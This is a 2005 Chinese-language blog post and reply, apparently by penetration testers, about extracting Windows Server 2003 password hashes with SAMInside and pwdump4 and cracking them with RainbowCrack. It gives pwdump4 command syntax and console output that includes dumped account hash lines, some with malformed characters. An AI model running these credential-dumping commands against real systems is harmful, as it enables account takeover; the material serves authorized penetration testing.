獲取windows密碼hash的兩個方式post by baozi @ 28 九月, 2005 09:47 在給客戶做滲透測試的時候，遇到一個win2k3機器，pwdump4讀不出密碼bash，lc5裝上去一讀的話LC5就掛掉，突然想到saminside這個東西，似乎記得他有兩個讀本地密碼散列的方式的，一個是一般的通過LSASS讀，還有一個就是通過shedule服務來讀，還沒去搜索后者什么原理，拿上去一試果然行，另存為pwdump文件回來用ranbowcrack跑，哈哈

國內似乎還沒有利用shedule服務讀密碼的cmd程序吧，哪個大蝦弄一個就好了，畢竟saminside圖形的不方便。

其實以前我也遇到過讀不出來密碼hash的 w2k3 的機器,只不過你參數用錯了 hieei

pwdump4 ip /o:fuckbaozi /u:administrator

用這種格式一般來說可以dump出hash來 ip 換成 127.0.0.1 :D

如果你用 /l 參數, 大部分是dump不出來的,即使dump出來,hash也是不全的.

C:/>pwdump4 127.0.0.1 /o:fuckbaozi /u:administrator

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.by bingle@email.com.cnThis program is free software based on pwpump3 by Phil Staubsunder the GNU General Public License Version 2.

Please enter the password >*******local path of //127.0.0.1/ADMIN$ is: C:/WINDOWSconnect to 127.0.0.1 for result, plz wait...SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminalLSA>Samr Enumerate 4 Users In Domain DREAM.All Completed.

C:/>type fuckbaoziAdministrator:500:A02F5A52E33540C0AAD3B435B514042E:00F0E9AB3FE77043C228DDB70E5C41A6:::Guest:501:AAD3B445B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::kaka:1004:9FFBED36199C0D0723WD3B83FA6627C7:E4CCAB020C323DC2411876AE032CD5FF:::SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:3279F1AC07C5E7C197752437531BB8B3:::

C:/>pwdump4 /l /o:fuckbaozi /u:administrator

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.by bingle@email.com.cnThis program is free software based on pwpump3 by Phil Staubsunder the GNU General Public License Version 2.

SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminal

C:/>type fuckbaoziAdministrator:500:A02F5322E10540A0AA33B435B51404EE:00F0E9433FE62378C228D4370E5C41A6:::Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

C:/>

如此而已,用pwdump4 ip /o:file /u:user的方式,我還沒有發現有不能dump出密碼hash的2003系統.